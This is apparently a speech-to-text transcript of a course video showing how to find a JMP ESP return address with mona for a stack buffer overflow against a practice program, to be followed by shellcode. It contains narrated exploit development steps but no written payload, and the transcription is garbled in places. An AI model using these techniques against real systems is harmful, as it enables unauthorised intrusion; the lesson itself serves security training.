21 hours 43 minutes
finding a return address
are learning objective is to understand how to find a return address.
So what I mean by this, ultimately we want to write shell code so that when we do our buffer overflow, the program executes into our jumps into our shell code. Well, as the name sounds, we need to find
a jump sp return address
where we can consistently have the program jump into our shell code so we can consistently get a shell.
What some programmers do is they have protections against buffer overflow attacks, like A S L R. So we want to do is try to find modules within the program that do not have these types of protections so that we can consistently over and over again jump into our shell code with the jump E S P
instruction by finding that memory location
that won't change every time.
So we can do that with mona.
So what I'll do now
is I'll do exclamation mona
And as you can see here
these are our modules. And we're going to look for false because everything that's true means that that flag that protection is on. And 11 of these uh we see has the most false is in them. Which is the do stack buffer overflow Good dot E X E
So the P W Kr pen 200 materials is a great job of explaining this
and they use the MSF Nazem shell module. But we're trying to find the
off code or hex for jump E S p.
Now, what they do find or what we have for Jump E S P is F F E four.
So keeping that in mind, we're going to use Mona
and we're gonna do Mona find
and here's the jump PSP instruction.
Sorry, my microphone slipped there.
Now we're going to do stack
buffer overflow good dot E X E.
so it's gonna find our our memory locations with jumpy sp instructions and we see we found two we found 080414 C three and 080416 B F. I can you can choose either. I chose the first one.
But we're going to do now is going to set a breakpoint at that memory location. So keep that in mind
And we're going to go to this address and we already have it here. 080414 C3.
And I'm gonna say this is a break point. You can see already did. But to toggle this you press F two,
you might get the suspicious breakpoint warning
but now I'm going to go back to Cali and you'll see where I changed my or where I wrote my python script how I changed it.
Keep in mind if you're having issues if you're saying permission denied when you write your script
Traumatic plus X. You can trim it at 777.
But that might be a reason why you're having issues executing your scripts.
if we look here we have our A's instead of Arby's. I'm replacing it with this memory location you can send me the comment here
but I'm doing it in a little indian format so I'm writing it backwards. So 080804041414 C. Three. So that's our memory location. So we're having it go to the jumpy sp instruction and then hopefully we move into our seas here.
So let's verify that. That's why I said that breakpoint at the memory location here.
And what we'll do is we will send this program.
I'm sorry to send the script.
And it should hit our break point
Here. We see it did. So now I press F7 to step through and we should see it land in our seas
And you can see 43 43. It did land in our seas.
So we verified that jumpy sp instruction. And now the only thing left to do is write our shell code so we can get a shell on this box.
So in summary we should now understand how to find a return address.